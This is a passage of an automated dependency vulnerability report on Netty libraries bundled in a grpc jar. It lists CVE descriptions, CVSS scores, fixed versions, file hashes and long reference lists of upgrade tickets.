CVE-2021-21409 vulnerability in netty version 4.1.60 - [pulsar-commits] 20210329 [GitHub] [pulsar] aahmed-se opened a new pull request #10073: Upgrade Netty version to 4.1.60.final - [pulsar-commits] 20210329 [GitHub] [pulsar] merlimat closed issue #10071: CVE-2021-21295 & CVE-2021-21290 - [pulsar-commits] 20210329 [GitHub] [pulsar] yaswanthnadella opened a new issue #10071: CVE-2021-21295 & CVE-2021-21290 - [pulsar-commits] 20211020 [GitHub] [pulsar] Shoothzj opened a new pull request #12437: [Security] Bump grpc to 1.41.0 - [ranger-dev] 20210317 [jira] [Assigned] (RANGER-3209) Upgrade netty to 4.1.60+ due to CVE-2021-21290 and CVE-2021-21295 - [ranger-dev] 20210317 [jira] [Created] (RANGER-3209) Upgrade netty to 4.1.60+ due to CVE-2021-21290 and CVE-2021-21295 - [zookeeper-commits] 20210331 [zookeeper] branch branch-3.5 updated: ZOOKEEPER-4272 ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [zookeeper-commits] 20210331 [zookeeper] branch branch-3.6 updated: ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [zookeeper-commits] 20210331 [zookeeper] branch branch-3.7 updated: ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [zookeeper-commits] 20210331 [zookeeper] branch master updated: ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [zookeeper-dev] 20210330 [jira] [Created] (ZOOKEEPER-4272) Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [zookeeper-dev] 20210928 [jira] [Created] (ZOOKEEPER-4390) CVE-2021-28169 - Upgrade jetty to 9.4.42 - [zookeeper-issues] 20210330 [jira] [Created] (ZOOKEEPER-4272) Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [zookeeper-issues] 20210330 [jira] [Updated] (ZOOKEEPER-4272) Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [zookeeper-issues] 20210331 [jira] [Assigned] (ZOOKEEPER-4272) Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [zookeeper-issues] 20210331 [jira] [Commented] (ZOOKEEPER-4272) Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [zookeeper-issues] 20210331 [jira] [Resolved] (ZOOKEEPER-4272) Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [zookeeper-issues] 20210331 [jira] [Updated] (ZOOKEEPER-4272) Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [zookeeper-issues] 20210401 [jira] [Commented] (ZOOKEEPER-4272) Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [zookeeper-issues] 20210402 [jira] [Commented] (ZOOKEEPER-4272) Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [zookeeper-issues] 20210928 [jira] [Created] (ZOOKEEPER-4390) CVE-2021-28169 - Upgrade jetty to 9.4.42 - [zookeeper-issues] 20210928 [jira] [Updated] (ZOOKEEPER-4390) CVE-2021-28169 , - Upgrade jetty to 9.4.42 - [zookeeper-issues] 20210928 [jira] [Updated] (ZOOKEEPER-4390) CVE-2021-28169 , CVE-2021-28163, - Upgrade jetty to 9.4.42 - [zookeeper-issues] 20210928 [jira] [Updated] (ZOOKEEPER-4390) CVE-2021-28169 , CVE-2021-28163, CVE-2021-34428- Upgrade jetty to 9.4.42 - [zookeeper-issues] 20210928 [jira] [Updated] (ZOOKEEPER-4390) CVE-2021-28169 - Upgrade jetty to 9.4.42 - [zookeeper-notifications] 20210331 [GitHub] [zookeeper] arshadmohammad closed pull request #1670: ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [zookeeper-notifications] 20210331 [GitHub] [zookeeper] arshadmohammad commented on pull request #1669: ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [zookeeper-notifications] 20210331 [GitHub] [zookeeper] arshadmohammad commented on pull request #1670: ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [zookeeper-notifications] 20210331 [GitHub] [zookeeper] asfgit closed pull request #1669: ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [zookeeper-notifications] 20210331 [GitHub] [zookeeper] ayushmantri opened a new pull request #1669: ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [zookeeper-notifications] 20210331 [GitHub] [zookeeper] ayushmantri opened a new pull request #1670: ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [zookeeper-notifications] 20210331 [GitHub] [zookeeper] eolivelli commented on pull request #1669: ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - https://lists.apache.org/thread.html/r04a3e0d9f53421fb946c60cc54762b7151dc692eb4e39970a7579052%40%3Ccommits.servicecomb.apache.org%3E - https://lists.apache.org/thread.html/r16c4b55ac82be72f28adad4f8061477e5f978199d5725691dcc82c24%40%3Ccommits.servicecomb.apache.org%3E - https://lists.apache.org/thread.html/r2e93ce23e04c3f0a61e987d1111d0695cb668ac4ec4edbf237bd3e80%40%3Ccommits.servicecomb.apache.org%3E - https://lists.apache.org/thread.html/r490ca5611c150d193b320a2608209180713b7c68e501b67b0cffb925%40%3Ccommits.servicecomb.apache.org%3E - https://lists.apache.org/thread.html/r57245853c7245baab09eae08728c52b58fd77666538092389cc3e882%40%3Ccommits.servicecomb.apache.org%3E - https://lists.apache.org/thread.html/r6d32fc3cd547f7c9a288a57c7f525f5d00a00d5d163613e0d10a23ef%40%3Ccommits.servicecomb.apache.org%3E - https://lists.apache.org/thread.html/r8bcaf7821247b1836b10f6a1a3a3212b06272fd4cde4a859de1b78cf%40%3Ccommits.servicecomb.apache.org%3E - https://lists.apache.org/thread.html/r8db1d7b3b9acc9e8d2776395e280eb9615dd7790e1da8c57039963de%40%3Cnotifications.zookeeper.apache.org%3E - https://lists.apache.org/thread.html/ra96c74c37ed7252f78392e1ad16442bd16ae72a4d6c8db50dd55c88b%40%3Ccommits.servicecomb.apache.org%3E - https://lists.apache.org/thread.html/racc191a1f70a4f13155e8002c61bddef2870b26441971c697436ad5d%40%3Ccommits.servicecomb.apache.org%3E - https://lists.apache.org/thread.html/rae198f44c3f7ac5264045e6ba976be1703cff38dcf1609916e50210d%40%3Ccommits.servicecomb.apache.org%3E - https://lists.apache.org/thread.html/rb523bb6c60196c5f58514b86a8585c2069a4852039b45de3818b29d2%40%3Ccommits.servicecomb.apache.org%3E - https://lists.apache.org/thread.html/rc73b8dd01b1be276d06bdf07883ecd93fe1a01f139a99ef30ba4308c%40%3Ccommits.servicecomb.apache.org%3E - https://lists.apache.org/thread.html/rcfc154eb2de23d2dc08a56100341161e1a40a8ea86c693735437e8f2%40%3Ccommits.servicecomb.apache.org%3E - https://lists.apache.org/thread.html/rd25c88aad0e76240dd09f0eb34bdab924933946429e068a167adcb73%40%3Ccommits.servicecomb.apache.org%3E - https://lists.apache.org/thread.html/rdb4db3f5a9c478ca52a7b164680b88877a5a9c174e7047676c006b2c%40%3Ccommits.servicecomb.apache.org%3E - https://lists.apache.org/thread.html/re4f70b62843e92163fab03b65e2aa8078693293a0c36f1cc260079ed%40%3Ccommits.servicecomb.apache.org%3E - https://lists.apache.org/thread.html/reafc834062486adfc7be5bb8f7b7793be0d33f483678a094c3f9d468%40%3Ccommits.servicecomb.apache.org%3E - https://lists.apache.org/thread.html/rf87b870a22aa5c77c27900967b518a71a7d954c2952860fce3794b60%40%3Ccommits.servicecomb.apache.org%3E CONFIRM - https://github.com/netty/netty/security/advisories/GHSA-wm47-8v5p-wjpj CONFIRM - https://security.netapp.com/advisory/ntap-20210604-0003/ DEBIAN - DSA-4885 MISC - https://github.com/Netflix/zuul/pull/980 MISC - https://github.com/netty/netty/commit/89c241e3b1795ff257af4ad6eadc616cb2fb3dc4 MISC - https://www.oracle.com/security-alerts/cpuapr2022.html OSSINDEX - [CVE-2021-21295] CWE-444: Inconsistent Interpretation of HTTP Requests ('HTTP Request Smuggling') OSSINDEX - [CVE-2021-21295] CWE-444: Inconsistent Interpretation of HTTP Requests ('HTTP Request Smuggling') OSSIndex - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-21295 OSSIndex - https://github.com/netty/netty/security/advisories/GHSA-wm47-8v5p-wjpj OSSIndex - https://lists.apache.org/thread/ztx01jknlcoq0v6pp2cwl609dyzk9r5h Vulnerable Software & Versions: (show all )
CVE-2021-21409 suppress
Netty is an open-source, asynchronous event-driven network application framework for rapid development of maintainable high performance protocol servers & clients. In Netty (io.netty:netty-codec-http2) before version 4.1.61.Final there is a vulnerability that enables request smuggling. The content-length header is not correctly validated if the request only uses a single Http2HeaderFrame with the endStream set to to true. This could lead to request smuggling if the request is proxied to a remote peer and translated to HTTP/1.1. This is a followup of GHSA-wm47-8v5p-wjpj/CVE-2021-21295 which did miss to fix this one case. This was fixed as part of 4.1.61.Final. CWE-444 Inconsistent Interpretation of HTTP Requests ('HTTP Request Smuggling')
CVSSv2:
Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:N/I:P/A:N CVSSv3:
Base Score: MEDIUM (5.9) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N References:
Vulnerable Software & Versions: (show all )
CVE-2021-21290 suppress
Netty is an open-source, asynchronous event-driven network application framework for rapid development of maintainable high performance protocol servers & clients. In Netty before version 4.1.59.Final there is a vulnerability on Unix-like systems involving an insecure temp file. When netty's multipart decoders are used local information disclosure can occur via the local system temporary directory if temporary storing uploads on the disk is enabled. On unix-like systems, the temporary directory is shared between all user. As such, writing to this directory using APIs that do not explicitly set the file/directory permissions can lead to information disclosure. Of note, this does not impact modern MacOS Operating Systems. The method "File.createTempFile" on unix-like systems creates a random file, but, by default will create this file with the permissions "-rw-r--r--". Thus, if sensitive information is written to this file, other local users can read this information. This is the case in netty's "AbstractDiskHttpData" is vulnerable. This has been fixed in version 4.1.59.Final. As a workaround, one may specify your own "java.io.tmpdir" when you start the JVM or use "DefaultHttpDataFactory.setBaseDir(...)" to set the directory to something that is only readable by the current user. CWE-378 Creation of Temporary File With Insecure Permissions, CWE-379 Creation of Temporary File in Directory with Incorrect Permissions
CVSSv2:
Base Score: LOW (1.9) Vector: /AV:L/AC:M/Au:N/C:P/I:N/A:N CVSSv3:
Base Score: MEDIUM (5.5) Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N References:
Vulnerable Software & Versions: (show all )
CVE-2022-24823 suppress
Netty is an open-source, asynchronous event-driven network application framework. The package `io.netty:netty-codec-http` prior to version 4.1.77.Final contains an insufficient fix for CVE-2021-21290. When Netty's multipart decoders are used local information disclosure can occur via the local system temporary directory if temporary storing uploads on the disk is enabled. This only impacts applications running on Java version 6 and lower. Additionally, this vulnerability impacts code running on Unix-like systems, and very old versions of Mac OSX and Windows as they all share the system temporary directory between all users. Version 4.1.77.Final contains a patch for this vulnerability. As a workaround, specify one's own `java.io.tmpdir` when starting the JVM or use DefaultHttpDataFactory.setBaseDir(...) to set the directory to something that is only readable by the current user. CWE-378 Creation of Temporary File With Insecure Permissions, CWE-379 Creation of Temporary File in Directory with Incorrect Permissions, CWE-668 Exposure of Resource to Wrong Sphere
CVSSv2:
Base Score: LOW (1.9) Vector: /AV:L/AC:M/Au:N/C:P/I:N/A:N CVSSv3:
Base Score: MEDIUM (5.5) Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N References:
Vulnerable Software & Versions: (show all )
grpc-netty-shaded-1.23.0.jar (shaded: io.netty:netty-tcnative-boringssl-static:2.0.25.Final)Description:
A Mavenized fork of Tomcat Native which incorporates various patches. This artifact is statically linked
to BoringSSL and Apache APR.
File Path: /var/simplicite/.m2/repository/io/grpc/grpc-netty-shaded/1.23.0/grpc-netty-shaded-1.23.0.jar/META-INF/maven/io.netty/netty-tcnative-boringssl-static/pom.xmlMD5: 601d7d7c7efa938fa3539002186b140dSHA1: 8f2aaa5e42b4097ef4f6462b17a61a98a7a995b1SHA256: aacb7d451c74c5234c82ce176aeb161818831d6d72dcb6eb19ab13f15e87ded6Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor pom artifactid netty-tcnative-boringssl-static Low Vendor pom groupid io.netty Highest Vendor pom name Netty/TomcatNative [BoringSSL - Static] High Vendor pom parent-artifactid netty-tcnative-parent Low Product pom artifactid netty-tcnative-boringssl-static Highest Product pom groupid io.netty Highest Product pom name Netty/TomcatNative [BoringSSL - Static] High Product pom parent-artifactid netty-tcnative-parent Medium Version pom version 2.0.25.Final Highest
grpc-netty-shaded-1.23.0.jar (shaded: io.netty:netty-transport:4.1.38.Final)File Path: /var/simplicite/.m2/repository/io/grpc/grpc-netty-shaded/1.23.0/grpc-netty-shaded-1.23.0.jar/META-INF/maven/io.netty/netty-transport/pom.xmlMD5: 24c9ec380bfb08ee98a2670b9a3ea3eeSHA1: 734d5091313d67ba6b5dc94e09920fa2453d01d7SHA256: a92c9e8fcb2b6e8879796a103b080326b17acf821baf04cf11c64521f14289e0Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor pom artifactid netty-transport Low Vendor pom groupid io.netty Highest Vendor pom name Netty/Transport High Vendor pom parent-artifactid netty-parent Low Product pom artifactid netty-transport Highest Product pom groupid io.netty Highest Product pom name Netty/Transport High Product pom parent-artifactid netty-parent Medium Version pom version 4.1.38.Final Highest
Related Dependencies grpc-netty-shaded-1.23.0.jar (shaded: io.netty:netty-buffer:4.1.38.Final)File Path: /var/simplicite/.m2/repository/io/grpc/grpc-netty-shaded/1.23.0/grpc-netty-shaded-1.23.0.jar/META-INF/maven/io.netty/netty-buffer/pom.xml MD5: 06d89427dca84970e25763e31bc07244 SHA1: 71d5e38bc0e4b51546f2f4a53eeaa20bd0a73993 SHA256: 2c08702c7b8b87875c47371db3b0d81dc8ec71499a090d4493f57b902cd6cf7f pkg:maven/io.netty/netty-buffer@4.1.38.Final grpc-netty-shaded-1.23.0.jar (shaded: io.netty:netty-codec-http:4.1.38.Final)File Path: /var/simplicite/.m2/repository/io/grpc/grpc-netty-shaded/1.23.0/grpc-netty-shaded-1.23.0.jar/META-INF/maven/io.netty/netty-codec-http/pom.xml MD5: 955014ef63a0c21125e5d309dc859a92 SHA1: b6f66bd507414001a6993d3307e648098fac1aaa SHA256: 965c019fc65bc29982af5259dc9f68f0d521376622df469867ec279f06ecc8e5 pkg:maven/io.netty/netty-codec-http@4.1.38.Final grpc-netty-shaded-1.23.0.jar (shaded: io.netty:netty-codec-socks:4.1.38.Final)File Path: /var/simplicite/.m2/repository/io/grpc/grpc-netty-shaded/1.23.0/grpc-netty-shaded-1.23.0.jar/META-INF/maven/io.netty/netty-codec-socks/pom.xml MD5: 6abacecb174a5883f3adff18ac9ea0b6 SHA1: d30d0b8d13f8bbf230876a81862224769fe4f589 SHA256: 2f5135cc248b35fe433c697c397b55a4b7f492624443219ab5ba49129fbaaea1 pkg:maven/io.netty/netty-codec-socks@4.1.38.Final grpc-netty-shaded-1.23.0.jar (shaded: io.netty:netty-common:4.1.38.Final)File Path: /var/simplicite/.m2/repository/io/grpc/grpc-netty-shaded/1.23.0/grpc-netty-shaded-1.23.0.jar/META-INF/maven/io.netty/netty-common/pom.xml MD5: 1ef6addff2c87906adb92e0cafabcf18 SHA1: a17d7c6632827d06b1fb8ef962529da4ac14c64e SHA256: 25dc2ba737c50c621b24eaa82aa90fcdda4ff7bb67c598186abee91239fee734 pkg:maven/io.netty/netty-common@4.1.38.Final grpc-netty-shaded-1.23.0.jar (shaded: io.netty:netty-handler-proxy:4.1.38.Final)File Path: /var/simplicite/.m2/repository/io/grpc/grpc-netty-shaded/1.23.0/grpc-netty-shaded-1.23.0.jar/META-INF/maven/io.netty/netty-handler-proxy/pom.xml MD5: 4339c99a13f4ea860ed0f3ae690822fc SHA1: 51755eac2b6c566044d0322a45a332297590e182 SHA256: 9433396ee7f781560dc8ffe89e1fe3a3ca3738dd5b45dc09cb412264a1b9f225 pkg:maven/io.netty/netty-handler-proxy@4.1.38.Final grpc-netty-shaded-1.23.0.jar (shaded: io.netty:netty-handler:4.1.38.Final)File Path: /var/simplicite/.m2/repository/io/grpc/grpc-netty-shaded/1.23.0/grpc-netty-shaded-1.23.0.jar/META-INF/maven/io.netty/netty-handler/pom.xml MD5: 9c540ae604e26aa2a2c57dabff602cef SHA1: 7722b747cdbaffd1a98e0893bbdac7fdfe906ecb SHA256: 2336a5ef47b7fe5fdbdeade2dc583b1fc8017d29d6b107e05e63ce4a3c3df384 pkg:maven/io.netty/netty-handler@4.1.38.Final grpc-netty-shaded-1.23.0.jar (shaded: io.netty:netty-resolver:4.1.38.Final)File Path: /var/simplicite/.m2/repository/io/grpc/grpc-netty-shaded/1.23.0/grpc-netty-shaded-1.23.0.jar/META-INF/maven/io.netty/netty-resolver/pom.xml MD5: 592b55ad9b36109508feed7cde75ed25 SHA1: 83a33ce2aad04aedc9d399e0ba281683ef53e148 SHA256: 6007b2056fd5107882b55d5de83ad868730a0b4d037e9aeb3d68685cf1681d0e pkg:maven/io.netty/netty-resolver@4.1.38.Final grpc-netty-shaded-1.23.0.jar (shaded: io.netty:netty-transport-native-epoll:4.1.38.Final)File Path: /var/simplicite/.m2/repository/io/grpc/grpc-netty-shaded/1.23.0/grpc-netty-shaded-1.23.0.jar/META-INF/maven/io.netty/netty-transport-native-epoll/pom.xml MD5: 521ad18d0bd2453793adedd864556e74 SHA1: 43c616d23bac844160a941db51c52253abac3c1c SHA256: 055d23b46ac0c0e5e1ae38f630f9fa2c726ff196af2dcd828807e625ea8d97ef pkg:maven/io.netty/netty-transport-native-epoll@4.1.38.Final grpc-netty-shaded-1.23.0.jar (shaded: io.netty:netty-transport-native-unix-common:4.1.38.Final)File Path: /var/simplicite/.m2/repository/io/grpc/grpc-netty-shaded/1.23.0/grpc-netty-shaded-1.23.0.jar/META-INF/maven/io.netty/netty-transport-native-unix-common/pom.xml MD5: 9cc9f1d932520d24dc0c3b5b69ade5ca SHA1: 2604dbad63fddad90523178ee2a694a1bde3e40f SHA256: a98261af8c9bfefd46b5dc71e93686243b58cd230340d92b1e86f89e88e9af6c pkg:maven/io.netty/netty-transport-native-unix-common@4.1.38.Final CVE-2019-20444 suppress
HttpObjectDecoder.java in Netty before 4.1.44 allows an HTTP header that lacks a colon, which might be interpreted as a separate header with an incorrect syntax, or might be interpreted as an "invalid fold." CWE-444 Inconsistent Interpretation of HTTP Requests ('HTTP Request Smuggling')
CVSSv2:
Base Score: MEDIUM (6.4) Vector: /AV:N/AC:L/Au:N/C:P/I:P/A:N CVSSv3:
Base Score: CRITICAL (9.1) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N References:
- FEDORA-2020-66b5f85ccc - [bookkeeper-issues] 20200729 [GitHub] [bookkeeper] padma81 opened a new issue #2387: Security vulnerabilities in the apache/bookkeeper-4.9.2 image - [camel-commits] 20201120 [camel] branch camel-2.25.x updated: Updating Netty to 4.1.48.Final to fix some CVEs (e.g. CVE-2019-16869, CVE-2019-20444) - [cassandra-commits] 20200218 [jira] [Created] (CASSANDRA-15590) Upgrade io.netty_netty-all dependency to fix security vulnerabilities - [cassandra-commits] 20200604 [jira] [Created] (CASSANDRA-15856) Security vulnerabilities with dependency jars of Cassandra 3.11.6 - [druid-commits] 20200131 [GitHub] [druid] ccaominh commented on a change in pull request #9300: Fix / suppress netty CVEs CVE-2019-20445 and CVE-2019-20444 - [druid-commits] 20200131 [GitHub] [druid] gianm merged pull request #9300: Fix / suppress netty CVEs CVE-2019-20445 and CVE-2019-20444 - [druid-commits] 20200131 [GitHub] [druid] zachjsh opened a new pull request #9300: Fix / suppress netty CVEs CVE-2019-20445 and CVE-2019-20444 - [flink-dev] 20200910 [jira] [Created] (FLINK-19195) question on security vulnerabilities in flink - [flink-issues] 20200910 [jira] [Created] (FLINK-19195) question on security vulnerabilities in flink - [flink-issues] 20210426 [jira] [Commented] (FLINK-22441) In Flink v1.11.3 contains netty(version:3.10.6) netty(version:4.1.60) . There are many vulnerabilities, like CVE-2021-21409 etc. please confirm these version and fix. thx - [geode-dev] 20200408 Proposal to bring GEODE-7969 to support/1.12 - [geode-dev] 20200408 Re: Proposal to bring GEODE-7969 to support/1.12 - [hadoop-common-commits] 20200309 [hadoop] branch branch-3.1 updated: HADOOP-16871. Upgrade Netty version to 4.1.45.Final to handle CVE-2019-20444, CVE-2019-16869 - [hadoop-common-commits] 20200309 [hadoop] branch branch-3.2 updated: HADOOP-16871. Upgrade Netty version to 4.1.45.Final to handle CVE-2019-20444, CVE-2019-16869 - [hadoop-common-commits] 20200309 [hadoop] branch trunk updated: HADOOP-16871. Upgrade Netty version to 4.1.45.Final to handle CVE-2019-20444, CVE-2019-16869 - [hadoop-common-issues] 20200219 [jira] [Assigned] (HADOOP-16871) Upgrade Netty version to 4.1.45.Final to handle CVE-2019-20444,CVE-2019-16869 - [hadoop-common-issues] 20200219 [jira] [Updated] (HADOOP-16871) Upgrade Netty version to 4.1.45.Final to handle CVE-2019-20444, - [hadoop-common-issues] 20200219 [jira] [Updated] (HADOOP-16871) Upgrade Netty version to 4.1.45.Final to handle CVE-2019-20444,CVE-2019-16869 - [hadoop-common-issues] 20200224 [jira] [Commented] (HADOOP-16871) Upgrade Netty version to 4.1.45.Final to handle CVE-2019-20444,CVE-2019-16869 - [hadoop-common-issues] 20200225 [jira] [Commented] (HADOOP-16871) Upgrade Netty version to 4.1.45.Final to handle CVE-2019-20444,CVE-2019-16869 - [hadoop-common-issues] 20200309 [jira] [Commented] (HADOOP-16871) Upgrade Netty version to 4.1.45.Final to handle CVE-2019-20444,CVE-2019-16869 - [hadoop-common-issues] 20200309 [jira] [Updated] (HADOOP-16871) Upgrade Netty version to 4.1.45.Final to handle CVE-2019-20444,CVE-2019-16869 - [hadoop-common-issues] 20200310 [jira] [Commented] (HADOOP-16871) Upgrade Netty version to 4.1.45.Final to handle CVE-2019-20444,CVE-2019-16869 - [pulsar-commits] 20201215 [GitHub] [pulsar] yanshuchong opened a new issue #8967: CVSS issue list - [pulsar-commits] 20210120 [GitHub] [pulsar] fmiguelez opened a new issue #9249: Upgrade Netty dependency in broker to solve vulnerabilities: CVE-2019-16869, CVE-2020-11612, CVE-2019-20445, CVE-2019-20444 - [pulsar-commits] 20210121 [GitHub] [pulsar] hpvd commented on issue #9249: Upgrade Netty dependency in broker to solve vulnerabilities: CVE-2019-16869, CVE-2020-11612, CVE-2019-20445, CVE-2019-20444 - [pulsar-commits] 20210122 [GitHub] [pulsar] hpvd commented on issue #9249: Upgrade Netty dependency in broker to solve vulnerabilities: CVE-2019-16869, CVE-2020-11612, CVE-2019-20445, CVE-2019-20444 - [spark-issues] 20210824 [jira] [Created] (SPARK-36572) Upgrade version of io.netty to 4.1.44.Final to solve CVE-2019-20444 and CVE-2019-20445 - [zookeeper-dev] 20200203 [jira] [Created] (ZOOKEEPER-3716) upgrade netty 4.1.42 to address CVE-2019-20444 CVE-2019-20445 - [zookeeper-dev] 20200204 Build failed in Jenkins: zookeeper-branch36-java11 #39 - [zookeeper-dev] 20200204 Build failed in Jenkins: zookeeper-branch36-java8 #38 - [zookeeper-dev] 20200204 Build failed in Jenkins: zookeeper-master-maven-jdk11 #361 - [zookeeper-issues] 20200203 [jira] [Assigned] (ZOOKEEPER-3716) upgrade netty 4.1.42 to address CVE-2019-20444 CVE-2019-20445 - [zookeeper-issues] 20200203 [jira] [Commented] (ZOOKEEPER-3716) upgrade netty 4.1.42 to address CVE-2019-20444 CVE-2019-20445 - [zookeeper-issues] 20200203 [jira] [Created] (ZOOKEEPER-3716) upgrade netty 4.1.42 to address CVE-2019-20444 CVE-2019-20445 - [zookeeper-issues] 20200203 [jira] [Updated] (ZOOKEEPER-3716) upgrade netty 4.1.42 to address CVE-2019-20444 CVE-2019-20445 - [zookeeper-issues] 20200204 [jira] [Resolved] (ZOOKEEPER-3716) upgrade netty 4.1.42 to address CVE-2019-20444 CVE-2019-20445 - [zookeeper-issues] 20200209 [jira] [Commented] (ZOOKEEPER-3716) upgrade netty 4.1.42 to address CVE-2019-20444 CVE-2019-20445 - [zookeeper-issues] 20200209 [jira] [Updated] (ZOOKEEPER-3716) upgrade netty 4.1.42 to address CVE-2019-20444 CVE-2019-20445 - https://lists.apache.org/thread.html/r0f5e72d5f69b4720dfe64fcbc2da9afae949ed1e9cbffa84bb7d92d7%40%3Cnotifications.zookeeper.apache.org%3E - https://lists.apache.org/thread.html/r310d2ce22304d5298ff87f10134f918c87919b452734f9841d95682d%40%3Ccommits.zookeeper.apache.org%3E - https://lists.apache.org/thread.html/r4c675b2d0cc2a5e506b11ee10d60a378859ee340aca052e4c7ef4749%40%3Cnotifications.zookeeper.apache.org%3E - https://lists.apache.org/thread.html/r819aaeb9944bdcfca438dcc51f05650dc728daf64dfd7d774fc2499b%40%3Ccommits.zookeeper.apache.org%3E - https://lists.apache.org/thread.html/r91e0fa345c86c128b75a4a791b4b503b53173ff4c13049ac7129d319%40%3Cnotifications.zookeeper.apache.org%3E - https://lists.apache.org/thread.html/r9b20cdac704cf9a583400350e2d5b576fa8417c18ddb961201676c60%40%3Ccommits.zookeeper.apache.org%3E - https://lists.apache.org/thread.html/rb84c57670ec48ef23f4d07973b7fa69f629b8e7fcfb48874362feb6f%40%3Ccommits.zookeeper.apache.org%3E - https://lists.apache.org/thread.html/rce71d33747010d32d31d90f5d737dae26291d96552f513a266c92fbb%40%3Cnotifications.zookeeper.apache.org%3E - https://lists.apache.org/thread.html/rfb55f245b08d8a6ec0fb4dc159022227cd22de34c4419c2fbb18802b%40%3Cnotifications.zookeeper.apache.org%3E DEBIAN - DSA-4885 MISC - https://github.com/netty/netty/compare/netty-4.1.43.Final...netty-4.1.44.Final MISC - https://github.com/netty/netty/issues/9866 MLIST - [debian-lts-announce] 20200219 [SECURITY] [DLA 2109-1] netty security update MLIST - [debian-lts-announce] 20200219 [SECURITY] [DLA 2110-1] netty-3.9 security update MLIST - [debian-lts-announce] 20200904 [SECURITY] [DLA 2364-1] netty security update MLIST - [debian-lts-announce] 20200904 [SECURITY] [DLA 2365-1] netty-3.9 security update OSSINDEX - [CVE-2019-20444] CWE-444: Inconsistent Interpretation of HTTP Requests ('HTTP Request Smuggling') OSSIndex - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-20444 OSSIndex - https://github.com/netty/netty/issues/9866 REDHAT - RHSA-2020:0497 REDHAT - RHSA-2020:0567 REDHAT - RHSA-2020:0601 REDHAT - RHSA-2020:0605 REDHAT - RHSA-2020:0606 REDHAT - RHSA-2020:0804 REDHAT - RHSA-2020:0805 REDHAT - RHSA-2020:0806 REDHAT - RHSA-2020:0811 UBUNTU - USN-4532-1 Vulnerable Software & Versions: (show all )
CVE-2019-20445 suppress
HttpObjectDecoder.java in Netty before 4.1.44 allows a Content-Length header to be accompanied by a second Content-Length header, or by a Transfer-Encoding header. CWE-444 Inconsistent Interpretation of HTTP Requests ('HTTP Request Smuggling')
CVSSv2:
Base Score: MEDIUM (6.4) Vector: /AV:N/AC:L/Au:N/C:P/I:P/A:N CVSSv3:
Base Score: CRITICAL (9.1) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N References:
- FEDORA-2020-66b5f85ccc - [bookkeeper-issues] 20200729 [GitHub] [bookkeeper] padma81 opened a new issue #2387: Security vulnerabilities in the apache/bookkeeper-4.9.2 image - [cassandra-commits] 20200218 [jira] [Created] (CASSANDRA-15590) Upgrade io.netty_netty-all dependency to fix security vulnerabilities - [cassandra-commits] 20200604 [jira] [Created] (CASSANDRA-15856) Security vulnerabilities with dependency jars of Cassandra 3.11.6 - [druid-commits] 20200131 [GitHub] [druid] ccaominh commented on a change in pull request #9300: Fix / suppress netty CVEs CVE-2019-20445 and CVE-2019-20444 - [druid-commits] 20200131 [GitHub] [druid] gianm merged pull request #9300: Fix / suppress netty CVEs CVE-2019-20445 and CVE-2019-20444 - [druid-commits] 20200131 [GitHub] [druid] zachjsh opened a new pull request #9300: Fix / suppress netty CVEs CVE-2019-20445 and CVE-2019-20444 - [flink-dev] 20200910 [jira] [Created] (FLINK-19195) question on security vulnerabilities in flink - [flink-issues] 20200910 [jira] [Created] (FLINK-19195) question on security vulnerabilities in flink - [flink-issues] 20210426 [jira] [Commented] (FLINK-22441) In Flink v1.11.3 contains netty(version:3.10.6) netty(version:4.1.60) . There are many vulnerabilities, like CVE-2021-21409 etc. please confirm these version and fix. thx - [flume-issues] 20200410 [jira] [Created] (FLUME-3363) CVE-2019-20445 - [flume-issues] 20200415 [jira] [Updated] (FLUME-3363) CVE-2019-20445 - [flume-issues] 20200422 [jira] [Commented] (FLUME-3363) CVE-2019-20445 - [geode-dev] 20200408 Proposal to bring GEODE-7969 to support/1.12 - [geode-dev] 20200408 Re: Proposal to bring GEODE-7969 to support/1.12 - [pulsar-commits] 20201215 [GitHub] [pulsar] yanshuchong opened a new issue #8967: CVSS issue list - [pulsar-commits] 20210120 [GitHub] [pulsar] fmiguelez opened a new issue #9249: Upgrade Netty dependency in broker to solve vulnerabilities: CVE-2019-16869, CVE-2020-11612, CVE-2019-20445, CVE-2019-20444 - [pulsar-commits] 20210121 [GitHub] 